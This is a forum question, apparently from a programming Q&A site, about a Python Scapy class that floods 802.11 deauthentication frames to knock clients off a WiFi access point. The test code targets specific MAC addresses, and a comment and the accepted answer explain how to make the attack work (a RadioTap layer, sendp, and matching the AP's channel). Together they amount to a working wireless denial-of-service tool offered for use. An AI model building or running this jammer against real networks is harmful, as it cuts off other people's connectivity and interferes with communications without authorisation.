# Wifi Jammer with Scapy not working

Tags: python, scapy, wifi

So I've been trying to get this Wifi Jammer working using Scapy.

I've followed this very simple tutorial, which should be enough to work:
https://www.youtube.com/watch?v=NKqG_i6qMJM

This did not work, although I get the same output.

Then I found this project:
https://github.com/DanMcInerney/wifijammer/blob/master/wifijammer.py

Which does some automated scanning and channel hopping to fill out some variables itself. If I run it, it works great.

So I came up with my own code, which I thought has everything to work but somehow it is as if nothing happens, although all the output seems to be fine.

Here is my AirJammer class (Can't get the code to indent properly on here, but it is correct in my actual project):

```
class AirDeauthenticator(object):

def __init__(self):
    self.deauth_running = False
    self.running_interface = None
    self.deauth_thread = None
    self.channel_hopper_thread = None
    self.channel_lock = Lock()
    self.current_channel = 3

    self.targeted_only = False      # Flag if we only want to perform targeted deauthentication attacks
    self._burst_count = 500           # Number of sequential deuathentication packet bursts to send
    self._bssids_to_deauth = []     # MAC addresses of APs, used to send deauthentication packets to broadcast
    self._clients_to_deauth = {}    # Pairs clients to their connected AP to send targeted deauthentication attacks

def add_bssid(self, bssid):
    self._bssids_to_deauth.append(bssid)

def add_client(self, client, bssid):
    self._clients_to_deauth[client] = bssid

def set_burst_count(self, count):
    self._burst_count = count

def hop_channels(self, interface, hop_interval):
    while self.deauth_running:
        print self.current_channel
        Popen(['iw', 'dev', interface, 'set', 'channel', str(self.current_channel)], stdout=DEVNULL, stderr=PIPE)
        with self.channel_lock:
            self.current_channel += 1
            if self.current_channel > 11:
                self.current_channel = 1

        sleep(hop_interval)

def deauthentication_attack(self, interface):
    # Based on:
    # https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
    packets = []

    if not self.targeted_only:
        for bssid in self._bssids_to_deauth:
            deauth_packet = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) / Dot11Deauth()
            packets.append(deauth_packet)

    for client in self._clients_to_deauth.keys():
        bssid = self._clients_to_deauth[client]
        deauth_packet1 = Dot11(addr1=bssid, addr2=client, addr3=client) / Dot11Deauth()
        deauth_packet2 = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
        packets.append(deauth_packet1)
        packets.append(deauth_packet2)

    count = self._burst_count if self._burst_count > 0 else 5

    print "N Packets: {}\n".format(len(packets))
    while count >= 0:
        for packet in packets:
            packet.show()
            send(packet, iface = interface, count = 1, inter = 0)

        count -= 1

    self.deauth_running = False
    self.running_interface = None

def start_deauthentication_attack(self, interface, hop_interval=5):
    self.running_interface = interface
    self.deauth_thread = Thread(target=self.deauthentication_attack, args=(interface,))
    self.channel_hopper_thread = Thread(target=self.hop_channels, args=(interface, hop_interval, ))

    self.deauth_running = True

    self.deauth_thread.start()
    self.channel_hopper_thread.start()
```

And here is my test code:

```
    deauthor = AirDeauthenticator()
    deauthor.add_bssid('00:04:CA:AC:E9:22')
    deauthor.add_client('e4:71:85:30:f5:14', '00:04:CA:AC:E9:22')
    deauthor.add_client('d8:5d:4c:9a:72:60', '00:04:CA:AC:E9:22')
    deauthor.start_deauthentication_attack('wlan1')
```

The output seems fine although I get this warning from scapy:
.WARNING: Mac address to reach destination not found. Using broadcast.
.WARNING: more Mac address to reach destination not found. Using broadcast.

But I saw the same output on the wifijammer.py tool, and the tool still works.

Is there anything else I need to be concerned about when trying to send these packets?

I have tried putting the interface in monitor mode but still no luck.

Ok as far as I was able to debug it, the problem really does lie in that warning message. If I unplug the usb-wifi stick and plug it back it this error does not arise the first time, it still does if I repeat the process.

I does not happen when I use the wifijammer.py tool, but I've analyzed the code repeatedly and haven't found any setup mechanism that would avoid this scapy issue.

Comment: my guess would be to add a `RadioTap()/` layer before the `Dot11()` Ines and use `sendp` instead of `send`. To anyone reading, retry using the latest version. 2016 is very long ago

Answer (score 0, accepted):

The problem here was the wifi channel I was running on.

For this to work one has to set the wifi channel to the same as the AP (the clients will also be on the same channels).

Without this the packets are sent on another frequency that target devices are not listening on.